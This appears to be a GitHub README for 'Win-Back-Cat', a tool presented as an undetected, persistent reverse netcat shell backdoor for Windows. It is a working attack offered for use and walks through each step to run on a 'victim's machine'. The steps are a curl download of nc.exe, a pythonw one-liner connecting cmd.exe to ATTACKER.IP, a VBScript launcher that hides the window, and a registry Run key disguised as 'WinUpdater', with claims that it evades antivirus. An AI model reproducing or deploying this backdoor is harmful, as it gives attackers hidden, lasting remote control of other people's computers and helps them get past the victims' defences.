Win-Back-Cat
A fully undetected, hidden, persistent, reverse netcat shell backdoor for Windows.
Report Issue
·
Request Feature
Prerequisites:
- You need to be logged in as an
Administrator
in order to be able to create a TCP listener with NetCat.
Python:
- Python should be preinstalled on latest versions of Windows.
- You can check by running
python --version
on command prompt. - If python is not installed, you will need to install it for this to work.
cURL:
- If you have version 1803 or later of Windows 10, cURL is installed by default.
- If you don't have cURL you will need to install it for this to work.
- Otherwise find an alternative way to fetch
nc.exe
Installation / How to use:
- Very simple, download and execute (on victim's machine) the batch script:
win-back-cat.bat
. - Run a netcat listener on attacker machine (ATTACKER.IP) to get a shell back. Example:
netcat -lvp 4445
Breakdown (What's in the script):
-
Move into Temp folder with Environment Variable
%TEMP%
as this helps with compatibility between Windows versions. -
Fetch our Netcat version from repo with:
curl https://raw.githubusercontent.com/RAF-87/win-back-cat/main/files/nc.exe > nc.exe
Why? - Reverse Shell
We need Linux version of Netcat compiled for Windows, instead of the common OpenBSD version.
The feature we need is this one:
-e filename
: specifyfilename
to exec after connect (use with caution). Connects STDIN and STDOUT to the specified file.
In our case the filename
will be cmd.exe
. This flag is missing on some versions for obvious Security reasons.
Pythonw - Undetected
- Why
pythonw.exe
instead ofpython.exe
?
pythonw.exe
is a GUI app for launching GUI/no-UI-at-all scripts.
-
NO console window is opened.
-
Execution is asynchronous: -- When invoked from a console window, the script is merely launched and the prompt returns right away, whether the script is still running or not.
-
Windows trusts python. 🤷
pythonw -c "from subprocess import check_output; check_output('nc.exe
ATTACKER.IP 4445 -e cmd.exe', shell=True);" >> wncat.bat
We use -c
to run the script as one-liner from string. We export it onto a batch script for easier execution chained with the next step.
Visual Basic - Hidden
Dim WinScriptHost
Set WinScriptHost = CreateObject("WScript.Shell")
WinScriptHost.Run Chr(34) & "%TEMP%\wncat.bat" & Chr(34), 0
Set WinScriptHost = Nothing
The above script, will run our batch script as a separate process on the background without the user ever seeing anything.
We need this to keep pythonw.exe
alive in the background, otherwise using just the batch script we would need a command prompt window always open.
Windows Registry - Persistent
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /f /v WinUpdater /t REG_SZ /d "%TEMP%\wncat.vbs"
We add our Visual Basic script to Run from the registry entry when Windows Boots up. So whenever we lose connection, the backdoor will reopen at the next reboot.
Tested on (Feel free to add to this list with a request):
- OS: Microsoft Windows 10 Pro 10.0.18363 N/A Build 18363
- Antivirus: Microsoft Defender, BitDefender
Note:
- Using these combined tools, Windows or Any Antivirus cannot detect this backdoor.
- Remember to edit
ATTACKER.IP
for the reverse shell to work.
Contact
- LinkedIn: https://www.linkedin.com/in/raffaele-paglietti/
- Email: wize@deadcyber.com
- Project Link: https://github.com/RAF-87/win-back-cat